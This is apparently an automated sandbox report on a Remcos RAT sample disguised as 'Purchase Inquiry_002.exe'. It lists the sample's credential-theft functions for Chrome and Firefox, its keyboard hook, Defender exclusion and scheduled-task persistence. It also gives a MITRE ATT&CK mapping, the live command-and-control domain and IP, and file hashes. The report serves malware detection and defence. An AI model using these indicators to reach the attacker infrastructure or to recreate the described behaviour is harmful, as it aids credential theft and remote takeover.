            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040A0B0 GetLocalTime,wsprintfW,14_2_0040A0B0
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004195F8 GetUserNameW,14_2_004195F8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_004466BF
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040A953
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: \key3.db14_2_0040AA71

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: cmd.exe14_2_0040567A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		211
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol211
            Input Capture            		2
            Encrypted Channel            		Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            Windows Service            		4
            Obfuscated Files or Information            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		Login Hook122
            Process Injection            		12
            Software Packing            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Scheduled Task/Job            		1
            DLL Side-Loading            		LSA Secrets33
            System Information Discovery            		SSHKeylogging12
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials121
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion            		DCSync31
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt122
            Process Injection            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560114 Sample: Purchase Inquiry_002.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 46 cee.work.gd 2->46 48 geoplugin.net 2->48 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 13 other signatures 2->60 8 Purchase Inquiry_002.exe 7 2->8         started        12 xASiLfzXONGIW.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\xASiLfzXONGIW.exe, PE32 8->38 dropped 40 C:\...\xASiLfzXONGIW.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp3EA3.tmp, XML 8->42 dropped 44 C:\Users\...\Purchase Inquiry_002.exe.log, ASCII 8->44 dropped 62 Adds a directory exclusion to Windows Defender 8->62 64 Injects a PE file into a foreign processes 8->64 14 Purchase Inquiry_002.exe 2 16 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 21 8->20         started        22 schtasks.exe 1 8->22         started        66 Multi AV Scanner detection for dropped file 12->66 68 Contains functionalty to change the wallpaper 12->68 70 Machine Learning detection for dropped file 12->70 72 4 other signatures 12->72 24 schtasks.exe 1 12->24         started        26 xASiLfzXONGIW.exe 12->26         started        signatures6 process7 dnsIp8 50 cee.work.gd 154.216.19.141, 2531, 49749 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 14->50 52 geoplugin.net 178.237.33.50, 49757, 80 ATOM86-ASATOM86NL Netherlands 14->52 74 Installs a global keyboard hook 14->74 76 Loading BitLocker PowerShell Module 18->76 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Purchase Inquiry_002.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            Purchase Inquiry_002.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            cee.work.gd100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            		178.237.33.50
            		truefalse
              		high
              cee.work.gd
              		154.216.19.141
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  		high
                  cee.work.gdtrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gp7Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://geoplugin.net/json.gp/CPurchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase Inquiry_002.exe, 00000000.00000002.1341190098.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000A.00000002.1380724904.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.ResourcesPurchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.drfalse
                          		high
                          http://geoplugin.net/json.gpSystem32Purchase Inquiry_002.exe, 00000009.00000002.3752431492.0000000001564000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            154.216.19.141
                            		cee.work.gdSeychelles
                            		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                            178.237.33.50
                            		geoplugin.netNetherlands
                            		8455ATOM86-ASATOM86NLfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1560114
                            Start date and time:2024-11-21 12:20:52 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Purchase Inquiry_002.exe
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.evad.winEXE@19/17@12/2
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 212
                            • Number of non-executed functions: 192
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target Purchase Inquiry_002.exe, PID 8184 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: Purchase Inquiry_002.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            06:21:44API Interceptor6220044x Sleep call for process: Purchase Inquiry_002.exe modified
                            06:21:47API Interceptor35x Sleep call for process: powershell.exe modified
                            06:21:49API Interceptor3x Sleep call for process: xASiLfzXONGIW.exe modified
                            12:21:47Task SchedulerRun new task: xASiLfzXONGIW path: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            154.216.19.1411732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              178.237.33.50APPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • geoplugin.net/json.gp
                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                              • geoplugin.net/json.gp
                              ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                              • geoplugin.net/json.gp
                              pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                              • geoplugin.net/json.gp
                              sostener.vbsGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              • geoplugin.net/json.gp

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              cee.work.gd1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 154.216.19.141
                              geoplugin.netAPPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 178.237.33.50
                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                              • 178.237.33.50
                              ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                              • 178.237.33.50
                              pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                              • 178.237.33.50
                              sostener.vbsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              • 178.237.33.50

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SKHT-ASShenzhenKatherineHengTechnologyInformationCodlr.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                              • 154.216.18.25
                              dlr.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                              • 154.216.18.25
                              dlr.x86.elfGet hashmaliciousMirai, OkiruBrowse
                              • 154.216.18.25
                              ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                              • 154.216.16.54
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 154.216.19.129
                              file.exeGet hashmaliciousUnknownBrowse
                              • 154.216.19.129
                              file.exeGet hashmaliciousUnknownBrowse
                              • 154.216.19.129
                              1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 154.216.19.141
                              dvwkja7.elfGet hashmaliciousMiraiBrowse
                              • 154.216.16.109
                              http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
                              • 154.216.17.193
                              ATOM86-ASATOM86NLAPPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                              • 178.237.33.50
                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                              • 178.237.33.50
                              ORDER AND SPECIFICATIONS.scr.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                              • 178.237.33.50
                              pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                              • 178.237.33.50
                              sostener.vbsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              • 178.237.33.50

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\ios\logs.dat

                              Download File
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):232
                              Entropy (8bit):7.152598493007967
                              Encrypted:false
                              SSDEEP:6:dHfjAxrbum1JZjKPT4JwpJC5d/RtnEbuJHQA:dHcFum1J9KPT/r67VtwA
                              MD5:459A5E89661B24D260FE10EB0A81154D
                              SHA1:5D77694CFA99D47CF0F35A47B2CAD30FDEC4C393
                              SHA-256:E4D708AD5AE3ADDC025EC3AB2E48596D13666114C195349F0B2019D2B4C1949F
                              SHA-512:AFD2827E4FF1F23656E9C6C5A9D496B4D7EAFE4A9869134158EA257126F308E3417BBA8BAF19DE0BD874E5FCBACE88A53FBA023984ECA342E5FF96DBC08D1162
                              Malicious:false
                              Reputation:low
                              Preview:. .w....s.G.w.Lj..)m.........w.Zpy.p.8<....2.P:..CU...?$...$w.....f..E.R.6"}.....z$,.].\.p.H...G.....Ma{...O]...".t-....{.1..0>..5xu...o.@...bh.m.tO.Ke..>..{.^Y]..zIQ..eEB.#......L.U.....U].....!...Uw.[.3n..>.-*.[X.Hk....

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Inquiry_002.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
